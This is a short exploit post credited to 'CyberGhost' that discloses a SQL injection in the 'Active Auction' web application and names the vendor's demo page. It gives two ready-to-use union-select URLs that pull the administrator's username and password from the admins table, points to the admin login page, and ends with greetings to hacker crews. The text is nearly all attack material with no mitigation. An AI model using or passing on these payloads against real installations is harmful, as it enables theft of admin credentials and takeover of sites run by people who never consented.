#Title : Active Auction Remote SQL Injection Vulnerability #Author : CyberGhost #Demo Page : http://www.activewebsoftwares.com/demoactiveauction #Script Page : http://www.activewebsoftwares.com/productinfo.aspx?productid=1 #Vuln. #Username : /default.asp?catid=-1+union+select+0,adminname,2+from+admins%20where%20adminid=1 #Password : /default.asp?catid=-1+union+select+0,password,2+from+admins%20where%20adminid=1 #Admin Login : /admin.asp ==================================== Thanx : redLine - Hackinger - excellance - Liarhack - SaCReD SeeR - MaTRax - KinSize - BolivaR - kerem125 - by_emR3 And All TURKISH HACKERS !